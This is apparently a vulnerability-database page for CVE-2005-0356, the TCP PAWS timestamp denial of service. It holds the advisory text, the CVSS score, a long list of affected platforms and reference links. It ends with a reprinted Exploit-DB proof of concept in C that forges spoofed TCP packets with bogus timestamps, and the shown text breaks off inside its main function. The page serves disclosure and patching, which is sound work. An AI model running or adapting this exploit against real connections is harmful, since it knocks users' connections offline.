CVE-2005-0356
CVSS 5.0
Published: 2005-05-31 00:00:00
Revised: 2008-09-05 16:46:02

[Original] Multiple TCP implementations with Protection Against Wrapped Sequence Numbers (PAWS) with the timestamps option enabled allow remote attackers to cause a denial of service (connection loss) via a spoofed packet with a large timer value, which causes the host to discard later packets because they appear to be too old.


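[CNNVD] Multiple Vendor TCP/IP Stack Timestamp PAWS Remote Denial of Service Vulnerability (CNNVD-200505-1247)

        The Transmission Control Protocol (TCP), defined in RFC 793, provides reliable host-to-host transmission over packet-switched networks. RFC 1323 introduced several techniques to improve TCP performance, two of which are TCP timestamps and Protection Against Wrapped Sequence Numbers (PAWS).
        The PAWS technique of TCP RFC 1323 contains a security vulnerability. When TCP timestamps are enabled, both endpoints of a TCP connection use an internal clock to mark the TCP header with a timestamp value. If TCP PAWS is configured to use the timestamp values, the TCP PAWS implementation is subject to a denial-of-service vulnerability.
        The vulnerability is triggered when an attacker sends enough TCP PAWS packets to a vulnerable computer. The attacker can set the packet timestamp to a very large value. When the target machine processes such a packet, its internal timer is updated to that value, which can cause all valid packets received afterwards to be dropped because they are considered too old or invalid. This technique can result in a denial of service on the targeted connection.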
        

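- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)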

cpe:/o:freebsd:freebsd:5.1FreeBSD 5.1
cpe:/o:freebsd:freebsd:2.1.6FreeBSD 2.1.6
cpe:/a:f5:big-ip:9.0.2
cpe:/o:cisco:content_services_switch_11500:7.10_%2805.07%29s
cpe:/o:cisco:sn_5420_storage_router:1.1%284%29
cpe:/o:freebsd:freebsd:5.0FreeBSD 5.0
cpe:/h:cisco:unity_server:4.0Cisco Unity Server 4.0
cpe:/a:f5:big-ip:4.5.6
cpe:/a:nortel:callpilot:703t
cpe:/h:nortel:7250_wlan_access_pointNortel WLAN Access Point 7250.0
cpe:/h:hitachi:gr3000
cpe:/o:microsoft:windows_2000:::professional
cpe:/a:cisco:secure_access_control_server:3.2%282%29
cpe:/o:cisco:sn_5428_storage_router:3.2.1-k9Cisco Storage Router SN5428 3.2.1-K9
cpe:/h:cisco:sn_5420_storage_routerCisco SN 5420 Storage Router
cpe:/o:freebsd:freebsd:3.0:releng
cpe:/o:openbsd:openbsd:3.1OpenBSD 3.1
cpe:/a:cisco:e-mail_managerCisco E-Mail Manager
cpe:/o:microsoft:windows_xp:::home
cpe:/a:cisco:personal_assistant:1.3%281%29Cisco Personal Assistant 1.3 (1)
cpe:/h:nortel:succession_communication_server_1000Nortel Succession Communications Server 1000
cpe:/o:freebsd:freebsd:2.2.3FreeBSD 2.2.3
cpe:/o:freebsd:freebsd:5.2FreeBSD 5.2
cpe:/h:cisco:unity_server:3.1Cisco Unity Server 3.1
cpe:/h:cisco:call_manager:2.0Cisco Call Manager 2.0
cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/a:cisco:ciscoworks_access_control_list_manager:1.5Cisco CiscoWorks Access Control List Manager 1.5
cpe:/a:cisco:secure_access_control_server:3.0
cpe:/o:freebsd:freebsd:4.9FreeBSD 4.9
cpe:/a:cisco:personal_assistant:1.4%281%29Cisco Personal Assistant 1.4(1)
cpe:/o:freebsd:freebsd:2.1.6.1FreeBSD 2.1.6.1
cpe:/o:freebsd:freebsd:4.0:releng
cpe:/h:cisco:call_manager:4.0Cisco Call Manager 4.0
cpe:/a:cisco:secure_access_control_server:3.0.3::windows_nt
cpe:/o:freebsd:freebsd:4.5:release_p32
cpe:/h:alaxala:alaxala_networks:ax7800r
cpe:/o:freebsd:freebsd:4.2:stable
cpe:/a:cisco:personal_assistant:1.4%282%29Cisco Personal Assistant 1.4(2)
cpe:/h:cisco:call_manager:3.1%282%29Cisco Call Manager 3.1.2
cpe:/a:cisco:ciscoworks_access_control_list_manager:1.6Cisco CiscoWorks Access Control List Manager 1.6
cpe:/h:cisco:unity_server:2.0Cisco Unity Server 2.0
cpe:/o:cisco:sn_5428_storage_router:3.2.2-k9Cisco Storage Router SN5428 3.2.2-K9
cpe:/o:freebsd:freebsd:5.0:release_p14
cpe:/a:f5:big-ip:4.4
cpe:/a:hitachi:alaxala:ax
cpe:/a:f5:big-ip:4.3
cpe:/h:nortel:7220_wlan_access_pointNortel WLAN Access Point 7220.0
cpe:/a:cisco:secure_access_control_server:2.4::windows_nt
cpe:/a:cisco:secure_access_control_server:2.3.6.1::unix
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:cisco:sn_5428_storage_router:3.3.2-k9Cisco Storage Router SN5428 3.3.2-K9
cpe:/a:f5:big-ip:4.6.2
cpe:/a:cisco:ciscoworks_vpn_security_management_solutionCisco CiscoWorks VPN_Security Management Solution
cpe:/h:cisco:content_services_switch_11503Cisco Content Services Switch CSS11503
cpe:/o:cisco:conference_connection:1.2Cisco Conference Connection 1.2
cpe:/o:freebsd:freebsd:5.1:releng
cpe:/a:f5:big-ip:4.5.11
cpe:/a:cisco:interactive_voice_response
cpe:/o:freebsd:freebsd:3.1FreeBSD 3.1
cpe:/h:yamaha:rtx1100
cpe:/h:cisco:call_manager:3.1%283a%29Cisco Call Manager 3.1.3a
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:freebsd:freebsd:4.9:releng
cpe:/h:alaxala:alaxala_networks:ax7800s
cpe:/a:cisco:ciscoworks_common_management_foundation:2.2Cisco CiscoWorks Common Management Foundation 2.2
cpe:/o:freebsd:freebsd:4.10FreeBSD 4.10
cpe:/a:cisco:ip_contact_center_enterpriseCisco IP Contact Center Enterprise
cpe:/a:cisco:ciscoworks_windowsCisco CiscoWorks Windows
cpe:/o:cisco:sn_5420_storage_router:1.1%283%29
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:cisco:sn_5428_storage_router:2-3.3.1-k9Cisco Storage Router SN5428 2-3.3.1-K9
cpe:/a:cisco:agent_desktopCisco Agent Desktop
cpe:/h:cisco:call_manager:1.0Cisco Call Manager 1.0
cpe:/a:cisco:secure_access_control_server:2.3::unix
cpe:/a:cisco:secure_access_control_server:3.3
cpe:/h:yamaha:rtx2000
cpe:/o:freebsd:freebsd:4.8:release_p6
cpe:/a:nortel:callpilot:200i
cpe:/a:cisco:secure_access_control_server:3.0.1::windows_nt
cpe:/h:yamaha:rtx1000
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4
cpe:/o:cisco:content_services_switch_11500:7.30_%2800.08%29s
cpe:/a:f5:big-ip:4.5.10
cpe:/o:freebsd:freebsd:2.2.5FreeBSD 2.2.5
cpe:/a:cisco:secure_access_control_server:2.6.2::windows_nt
cpe:/a:cisco:secure_access_control_server:3.2%281.20%29
cpe:/o:freebsd:freebsd:3.5.1FreeBSD 3.5.1
cpe:/h:cisco:aironet_ap350Cisco Aironet 350 IOS
cpe:/o:freebsd:freebsd:4.11:release_p3
cpe:/h:cisco:content_services_switch_11506Cisco Content Services Switch CSS11506
cpe:/h:hitachi:gs4000
cpe:/h:cisco:unity_server:2.2Cisco Unity Server 2.2
cpe:/a:cisco:secure_access_control_server:3.2%283%29
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:freebsd:freebsd:4.7:release_p17
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:freebsd:freebsd:3.2FreeBSD 3.2
cpe:/o:freebsd:freebsd:2.0.5FreeBSD 2.0.5
cpe:/o:microsoft:windows_2003_server:standard_64-bit
cpe:/o:freebsd:freebsd:4.7FreeBSD 4.7
cpe:/o:freebsd:freebsd:5.3:releng
cpe:/o:freebsd:freebsd:5.1:release
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:freebsd:freebsd:4.4:release_p42
cpe:/h:yamaha:rtx1500
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:cisco:ciscoworks_cd1:4th
cpe:/a:cisco:secure_access_control_server:2.6.4::windows_nt
cpe:/h:nortel:ethernet_routing_switch_1624Nortel Ethernet Routing Switch 1624
cpe:/o:freebsd:freebsd:5.1:alpha
cpe:/o:cisco:sn_5428_storage_router:2.5.1-k9Cisco Storage Router SN5428 2.5.1-K9
cpe:/o:cisco:sn_5420_storage_router:1.1.3
cpe:/h:nortel:optical_metro_5100Nortel Optical Metro 5100
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_2000:::server
cpe:/o:freebsd:freebsd:2.0FreeBSD 2.0
cpe:/o:microsoft:windows_xp:::embedded
cpe:/a:nortel:business_communications_manager:400
cpe:/a:cisco:secure_access_control_server:3.2::windows_server
cpe:/h:cisco:call_manager:3.3Cisco Call Manager 3.3
cpe:/o:cisco:ciscoworks_cd1:1st
cpe:/o:freebsd:freebsd:4.0FreeBSD 4.0
cpe:/o:openbsd:openbsd:3.3OpenBSD 3.3
cpe:/a:cisco:secure_access_control_server:3.2.2
cpe:/o:freebsd:freebsd:4.10:releng
cpe:/o:cisco:content_services_switch_11500:7.30_%2800.09%29s
cpe:/a:cisco:secure_access_control_server:2.6.3::windows_nt
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/a:cisco:secure_access_control_server:3.2
cpe:/a:cisco:secure_access_control_server_solution_engine:3.3.1
cpe:/a:nortel:contact_centerNortel Conact Center
cpe:/a:cisco:secure_access_control_server:2.3.5.1::unix
cpe:/o:cisco:content_services_switch_11500:7.20_%2803.09%29s
cpe:/o:cisco:sn_5428_storage_router:3.3.1-k9Cisco Storage Router SN5428 3.3.1-K9
cpe:/a:cisco:personal_assistant:1.3%284%29Cisco Personal Assistant 1.3 (4)
cpe:/o:cisco:mgx_8230:1.2.11Cisco MGX 8230 1.2.11
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:cisco:mgx_8230:1.2.10Cisco MGX 8230 1.2.10
cpe:/h:hitachi:gr4000
cpe:/o:freebsd:freebsd:5.0:releng
cpe:/o:freebsd:freebsd:4.4:releng
cpe:/o:freebsd:freebsd:5.3:release
cpe:/a:nortel:callpilot:201i
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/a:cisco:secure_access_control_server:3.1.1::windows_nt
cpe:/h:yamaha:rtv700
cpe:/a:cisco:secure_access_control_server:3.3%281%29
cpe:/o:cisco:ciscoworks_cd1:3rd
cpe:/a:cisco:secure_access_control_server_solution_engine:3.3
cpe:/o:freebsd:freebsd:2.1.5FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:4.1.1FreeBSD 4.1.1
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/a:f5:big-ip:9.0.1
cpe:/a:f5:big-ip:4.5.9
cpe:/h:nortel:universal_signaling_point:5200
cpe:/o:cisco:ciscoworks_cd1:5th
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/h:yamaha:rt300i
cpe:/a:f5:big-ip:4.5
cpe:/o:openbsd:openbsd:3.0OpenBSD 3.0
cpe:/o:freebsd:freebsd:4.3:releng
cpe:/o:freebsd:freebsd:4.6.2FreeBSD 4.6.2
cpe:/a:cisco:ciscoworks_common_management_foundation:2.0Cisco CiscoWorks Common Management Foundation 2.0
cpe:/h:cisco:unity_server:2.4Cisco Unity Server 2.4
cpe:/o:freebsd:freebsd:3.5:stable
cpe:/a:f5:big-ip:4.5.12
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:freebsd:freebsd:2.2.4FreeBSD 2.2.4
cpe:/o:freebsd:freebsd:4.6:stable
cpe:/a:f5:big-ip:9.0.5
cpe:/a:cisco:secure_access_control_server:2.1::windows_nt
cpe:/o:cisco:mgx_8250:1.2.10Cisco MGX 8250 1.2.10
cpe:/o:freebsd:freebsd:2.1.0FreeBSD 2.1.0
cpe:/o:freebsd:freebsd:4.7:releng
cpe:/a:nortel:business_communications_manager:1000
cpe:/a:cisco:personal_assistant:1.3%283%29Cisco Personal Assistant 1.3 (3)
cpe:/o:cisco:ciscoworks_1105_wireless_lan_solution_engineCisco CiscoWorks 1105 Wireless LAN Solution Engine
cpe:/h:nortel:optical_metro_5200Nortel Optical Metro 5200
cpe:/o:freebsd:freebsd:4.3:release_p38
cpe:/o:freebsd:freebsd:4.1.1:stable
cpe:/a:f5:big-ip:9.0
cpe:/o:freebsd:freebsd:2.2FreeBSD 2.2
cpe:/h:nortel:ethernet_routing_switch_1612Nortel Ethernet Routing Switch 1612
cpe:/o:freebsd:freebsd:5.4:release
cpe:/a:cisco:ciscoworks_common_management_foundation:2.1Cisco CiscoWorks Common Management Foundation 2.1
cpe:/o:openbsd:openbsd:3.4OpenBSD 3.4
cpe:/a:cisco:personal_assistant:1.3%282%29Cisco Personal Assistant 1.3 (2)
cpe:/a:cisco:meetingplaceCisco MeetingPlace
cpe:/a:f5:big-ip:4.2
cpe:/o:freebsd:freebsd:3.0FreeBSD 3.0
cpe:/h:cisco:aironet_ap1200Cisco Aironet 1200
cpe:/o:cisco:sn_5420_storage_router:1.1%282%29
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/a:cisco:remote_monitoring_suite_optionCisco Remote Monitoring Suite Option
cpe:/o:freebsd:freebsd:4.5:stable
cpe:/o:freebsd:freebsd:4.6:release
cpe:/a:nortel:business_communications_manager:200
cpe:/o:freebsd:freebsd:4.5FreeBSD 4.5
cpe:/o:freebsd:freebsd:4.7:release
cpe:/o:freebsd:freebsd:4.3:stable
cpe:/o:freebsd:freebsd:4.3:release
cpe:/h:nortel:universal_signaling_point:compact_lite
cpe:/o:cisco:conference_connection:1.1%281%29Cisco Conference Connection 1.1 (1)
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:freebsd:freebsd:4.6FreeBSD 4.6
cpe:/h:yamaha:rt105
cpe:/o:cisco:sn_5428_storage_router:2-3.3.2-k9Cisco Storage Router SN5428 2-3.3.2-K9
cpe:/o:freebsd:freebsd:3.4FreeBSD 3.4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/a:cisco:secure_access_control_server:2.5::windows_nt
cpe:/h:cisco:content_services_switch_11150Cisco Cisco Content Services 11150
cpe:/a:f5:big-ip:4.6
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/a:cisco:secure_access_control_server_solution_engine:3.3.2
cpe:/o:freebsd:freebsd:2.2.8FreeBSD 2.2.8
cpe:/o:freebsd:freebsd:4.7:stable
cpe:/a:f5:big-ip:4.0
cpe:/o:freebsd:freebsd:4.5:release
cpe:/o:freebsd:freebsd:4.8:pre-release
cpe:/o:freebsd:freebsd:4.8FreeBSD 4.8
cpe:/o:cisco:ciscoworks_1105_hosting_solution_engineCisco CiscoWorks 1105 Hosting Solution Engine
cpe:/h:cisco:unity_server:3.2Cisco Unity Server 3.2
cpe:/h:cisco:unity_server:2.3Cisco Unity Server 2.3
cpe:/o:freebsd:freebsd:4.3FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.8:releng
cpe:/o:cisco:ciscoworks_windows_wugCisco CiscoWorks Windows_WUG
cpe:/h:yamaha:rt57i
cpe:/o:openbsd:openbsd:3.2OpenBSD 3.2
cpe:/o:freebsd:freebsd:3.5.1:release
cpe:/o:openbsd:openbsd:3.5OpenBSD 3.5
cpe:/a:f5:big-ip:9.0.4
cpe:/a:cisco:secure_access_control_server:3.0::windows_nt
cpe:/a:cisco:support_toolsCisco Support Tools
cpe:/a:cisco:secure_access_control_server:3.3.1
cpe:/h:cisco:call_manager:3.1Cisco Call Manager 3.1
cpe:/o:cisco:sn_5420_storage_router:1.1%285%29
cpe:/o:freebsd:freebsd:5.2.1:release
cpe:/o:freebsd:freebsd:4.9:pre-release
cpe:/h:cisco:call_manager:3.2Cisco Call Manager 3.2
cpe:/o:freebsd:freebsd:3.5.1:stable
cpe:/h:cisco:content_services_switch_11800Cisco Cisco Content Services 11800
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/a:cisco:secure_access_control_server:3.3.2
cpe:/o:freebsd:freebsd:4.11:releng
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/h:cisco:unity_server:3.3Cisco Unity Server 3.3
cpe:/a:cisco:secure_access_control_server:3.2.1
cpe:/h:nortel:ethernet_routing_switch_1648Nortel Ethernet Routing Switch 1648
cpe:/a:nortel:callpilot:702t
cpe:/o:freebsd:freebsd:3.5FreeBSD 3.5
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:freebsd:freebsd:4.10:release
cpe:/h:yamaha:rt250i
cpe:/o:freebsd:freebsd:4.1.1:release
cpe:/o:freebsd:freebsd:4.2FreeBSD 4.2
cpe:/o:freebsd:freebsd:4.11:stable
cpe:/o:freebsd:freebsd:5.4:pre-release
cpe:/o:freebsd:freebsd:2.2.6FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:4.4:stable
cpe:/o:freebsd:freebsd:5.3FreeBSD 5.3
cpe:/h:cisco:unity_server:3.0Cisco Unity Server 3.0
cpe:/o:cisco:content_services_switch_11500:7.20_%2803.10%29s
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/a:cisco:secure_access_control_server:3.2%281%29
cpe:/o:freebsd:freebsd:4.6:releng
cpe:/a:cisco:ciscoworks_lms:1.3Cisco CiscoWorks LMS 1.3
cpe:/o:cisco:mgx_8250:1.2.11Cisco MGX 8250 1.2.11
cpe:/h:nortel:survivable_remote_gateway:1.0Nortel SRG 1.0
cpe:/o:freebsd:freebsd:4.10:release_p8
cpe:/o:cisco:ciscoworks_cd1:2nd
cpe:/h:cisco:unity_server:2.46Cisco Unity Server 2.46
cpe:/o:freebsd:freebsd:2.2.2FreeBSD 2.2.2
cpe:/o:freebsd:freebsd:1.1.5.1FreeBSD 1.1.5.1
cpe:/o:microsoft:windows_xp::sp1:media_centerMicrosoft windows xp_sp1 media_center
cpe:/a:cisco:intelligent_contact_manager:5.0Cisco Intelligent Contact Manager 5.0
cpe:/a:cisco:secure_access_control_server:3.1
cpe:/o:freebsd:freebsd:2.1.7.1FreeBSD 2.1.7.1
cpe:/o:freebsd:freebsd:5.1:release_p5
cpe:/h:cisco:unity_server:2.1Cisco Unity Server 2.1
cpe:/h:alaxala:alaxala_networks:ax5400s
cpe:/a:cisco:secure_access_control_server:2.0::unix
cpe:/a:cisco:ip_contact_center_expressCisco IP Contact Center Express
cpe:/h:nortel:optical_metro_5000Nortel Optical Metro 5000
cpe:/h:cisco:content_services_switch_11500Cisco Content Service Switch 11500
cpe:/h:cisco:content_services_switch_11000Cisco Content Service 11000
cpe:/o:freebsd:freebsd:5.3:stable
cpe:/a:cisco:web_collaboration_optionCisco Web Collaboration Option
cpe:/h:cisco:content_services_switch_11501Cisco Content Services Switch CSS11501
cpe:/o:freebsd:freebsd:4.6:release_p20
cpe:/a:cisco:secure_access_control_server:2.6::windows_nt
cpe:/o:freebsd:freebsd:5.0:alpha
cpe:/a:cisco:ciscoworks_common_services:2.2Cisco CiscoWorks Common Services 2.2
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:freebsd:freebsd:4.4FreeBSD 4.4
cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:freebsd:freebsd:4.5:releng
cpe:/o:openbsd:openbsd:3.6OpenBSD 3.6
cpe:/h:cisco:content_services_switch_11050Cisco Cisco Content Services 11050
cpe:/a:cisco:emergency_responder:1.1Cisco Emergency Responder 1.1
cpe:/o:freebsd:freebsd:4.1FreeBSD 4.1
cpe:/o:cisco:sn_5420_storage_router:1.1%287%29
cpe:/o:microsoft:windows_xp::sp1:embeddedMicrosoft windows xp_sp1 embedded
cpe:/o:microsoft:windows_2003_server:web
cpe:/a:f5:big-ip:9.0.3
cpe:/a:cisco:secure_access_control_server:2.42::windows_nt
cpe:/o:freebsd:freebsd:5.2.1:releng
cpe:/h:cisco:call_manager:3.0Cisco Call Manager 3.0
cpe:/o:freebsd:freebsd:3.3FreeBSD 3.3
cpe:/o:freebsd:freebsd:4.0:alpha
cpe:/h:cisco:call_manager:3.3%283%29Cisco Call Manager 3.3.3
cpe:/a:cisco:secure_access_control_server:2.3::windows_nt

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0356
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0356
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1247
(Official data source) CNNVD

- Other Links and Resources

http://www.kb.cert.org/vuls/id/637934
(VENDOR_ADVISORY)  CERT-VN  VU#637934
http://secunia.com/advisories/15417/
(PATCH)  SECUNIA  15417
http://xforce.iss.net/xforce/xfdb/20635
(UNKNOWN)  XF  tcp-ip-timestamp-dos(20635)
http://www.securityfocus.com/bid/13676
(UNKNOWN)  BID  13676
http://www.cisco.com/warp/public/707/cisco-sn-20050518-tcpts.shtml
(VENDOR_ADVISORY)  CISCO  20050518 Vulnerability in a Variant of the TCP Timestamps Option
http://secunia.com/advisories/15393
(UNKNOWN)  SECUNIA  15393
http://support.avaya.com/elmodocs2/security/ASA-2006-032.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-032.htm
http://secunia.com/advisories/18662
(UNKNOWN)  SECUNIA  18662
http://secunia.com/advisories/18222
(UNKNOWN)  SECUNIA  18222
ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.64/SCOSA-2005.64.txt
(UNKNOWN)  SCO  SCOSA-2005.64
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-05:15.tcp.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-05:15

- Vulnerability Information

Multiple Vendor TCP/IP Stack Timestamp PAWS Remote Denial of Service Vulnerability
Medium risk  Design error
2005-05-31 00:00:00 2005-10-20 00:00:00
Remote
        

- Advisories and Patches

        The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
        http://www.openbsd.org/security.html

- Vulnerability Information (1008)

TCP TIMESTAMPS Denial of Service Exploit (EDBID:1008)
multiple dos
2005-05-21 Verified
0 Daniel Hartmeier
/*
* TCP does not adequately validate segments before updating timestamp value
* http://www.kb.cert.org/vuls/id/637934
*
* RFC-1323 (TCP Extensions for High Performance)
*
* 4.2.1 defines how the PAWS algorithm should drop packets with invalid
* timestamp options:
* 
* R1) If there is a Timestamps option in the arriving segment
* and SEG.TSval < TS.Recent and if TS.Recent is valid (see
* later discussion), then treat the arriving segment as not
* acceptable:
*
* Send an acknowledgement in reply as specified in
* RFC-793 page 69 and drop the segment.
*
* 3.4 defines what timestamp options to accept:
*
* (2) If Last.ACK.sent falls within the range of sequence numbers
* of an incoming segment:
*
* SEG.SEQ <= Last.ACK.sent < SEG.SEQ + SEG.LEN
*
* then the TSval from the segment is copied to TS.Recent;
* otherwise, the TSval is ignored.
*
* http://community.roxen.com/developers/idocs/drafts/
* draft-jacobson-tsvwg-1323bis-00.html
*
* 3.4 suggests a slightly different check like
*
* (2) If: SEG.TSval >= TSrecent and SEG.SEQ <= Last.ACK.sent
* then SEG.TSval is copied to TS.Recent; otherwise, it is
* ignored.
*
* and explains this change
*
* APPENDIX C: CHANGES FROM RFC-1072, RFC-1185, RFC-1323
*
* There are additional changes in this document from RFC-1323.
* These changes are:
* (b) In RFC-1323, section 3.4, step (2) of the algorithm to control
* which timestamp is echoed was incorrect in two regards:
* (1) It failed to update TSrecent for a retransmitted segment
* that resulted from a lost ACK.
* (2) It failed if SEG.LEN = 0.
* In the new algorithm, the case of SEG.TSval = TSrecent is
* included for consistency with the PAWS test.
*
* At least OpenBSD and FreeBSD contain this code instead:
*
* sys/netinet/tcp_input.c tcp_input()
*
* **
* * If last ACK falls within this segment's sequence numbers,
* * record its timestamp.
* * NOTE that the test is modified according to the latest
* * proposal of the tcplw@cray.com list (Braden 1993/04/26).
* **
* if ((to.to_flags & TOF_TS) != 0 &&
* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
* tp->ts_recent_age = ticks;
* tp->ts_recent = to.to_tsval;
* }
*
* The problem here is that the packet the timestamp is accepted from doesn't
* need to have a valid th_seq or th_ack. This point of execution is reached
* for packets with arbitrary th_ack values and th_seq values of half the
* possible value range, because the first 'if (todrop > tlen)' check in the
* function explicitly continues execution to process ACKs.
*
* If an attacker knows (or guesses) the source and destination addresses and
* ports of a connection between two peers, he can send spoofed TCP packets
* to either peer containing bogus timestamp options. Since half of the
* possible th_seq and timestamp values are accepted, four packets containing
* two random values and their integer wraparound opposites are sufficient to
* get one random timestamp accepted by the recipient. Further packets from
* the real peer will get dropped by PAWS, and the TCP connection stalls and
* times out.
*
* The following change reverts the tcp_input() check back to the implemented
* suggested by draft-jacobson-tsvwg-1323bis-00.txt
*
* if (opti.ts_present && TSTMP_GEQ(opti.ts_val, tp->ts_recent) &&
* SEQ_LEQ(th->th_seq, tp->last_ack_sent)) {
* + if (SEQ_LEQ(tp->last_ack_sent, th->th_seq + tlen +
* + ((tiflags & (TH_SYN|TH_FIN)) != 0)))
* + tp->ts_recent = opti.ts_val;
* + else
* + tp->ts_recent = 0;
* tp->ts_recent_age = tcp_now;
* - tp->ts_recent = opti.ts_val;
* }
*
* I can't find Braden's proposal referenced in the comment. It seems to
* pre-date draft-jacobson-tsvwg-1323bis-00.txt and might be outdated by
* it.
*
* Fri Mar 11 02:33:36 MET 2005 Daniel Hartmeier <daniel@benzedrine.cx>
*
* http://www.openbsd.org/cgi-bin/cvsweb/src/sys/netinet/tcp_input.c.diff\
* ?r1=1.184&r2=1.185&f=h
*
* http://www.freebsd.org/cgi/cvsweb.cgi/src/sys/netinet/tcp_input.c.diff\
* ?r1=1.252.2.15&r2=1.252.2.16&f=h
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <net/if.h>
#ifdef __FreeBSD__
#include <net/if_var.h>
#endif
#include <netinet/in.h>
#include <netinet/in_var.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

static u_int16_t
checksum(u_int16_t *data, u_int16_t length)
{
u_int32_t value = 0;
u_int16_t i;

for (i = 0; i < (length >> 1); ++i)
value += data[i];
if ((length & 1) == 1)
value += (data[i] << 8);
value = (value & 65535) + (value >> 16);
return (~value);
}

static int
send_tcp(int sock, u_int32_t saddr, u_int32_t daddr, u_int16_t sport,
u_int16_t dport, u_int32_t seq, u_int32_t ts)
{
u_char packet[1600];
struct tcphdr *tcp;
struct ip *ip;
unsigned char *opt;
int optlen, len, r;
struct sockaddr_in sin;

memset(packet, 0, sizeof(packet));

opt = packet + sizeof(struct ip) + sizeof(struct tcphdr);
optlen = 0;
opt[optlen++] = TCPOPT_NOP;
opt[optlen++] = TCPOPT_NOP;
opt[optlen++] = TCPOPT_TIMESTAMP;
opt[optlen++] = 10;
ts = htonl(ts);
memcpy(opt + optlen, &ts, sizeof(ts));
optlen += sizeof(ts);
ts = htonl(0);
memcpy(opt + optlen, &ts, sizeof(ts));
optlen += sizeof(ts);

len = sizeof(struct ip) + sizeof(struct tcphdr) + optlen;

ip = (struct ip *)packet;
ip->ip_src.s_addr = saddr;
ip->ip_dst.s_addr = daddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_len = htons(sizeof(struct tcphdr) + optlen);

tcp = (struct tcphdr *)(packet + sizeof(struct ip));
tcp->th_sport = htons(sport);
tcp->th_dport = htons(dport);
tcp->th_seq = htonl(seq);
tcp->th_ack = 0;
tcp->th_off = (sizeof(struct tcphdr) + optlen) / 4;
tcp->th_flags = 0;
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;

tcp->th_sum = checksum((u_int16_t *)ip, len);

ip->ip_v = 4;
ip->ip_hl = 5;
ip->ip_tos = 0;
ip->ip_len = htons(len);
ip->ip_id = htons(arc4random() % 65536);
ip->ip_off = 0;
ip->ip_ttl = 64;

sin.sin_family = AF_INET;
sin.sin_addr.s_addr = saddr;

r = sendto(sock, packet, len, 0, (struct sockaddr *)&sin, sizeof(sin));
if (r != len) {
perror("sendto");
return (1);
}

return (0);
}

static u_int32_t
op(u_int32_t u)
{
return (u_int32_t)(((u_int64_t)u + 2147483648UL) % 4294967296ULL);
}

int main(int argc, char *argv[])
{
u_int32_t saddr, daddr, seq, ts;
u_int16_t sport, dport;
int sock, i;

if (argc != 5) {
fprintf(stderr, "usage: %s <src ip> <src port> "
"<dst ip> <dst port>\n", argv[0]);
return (1);
}

saddr = inet_addr(argv[1]);
daddr = inet_addr(argv[3]);
sport = atoi(argv[2]);
dport = atoi(argv[4]);

sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock < 0) {
perror("socket");
return (1);
}
i = 1;
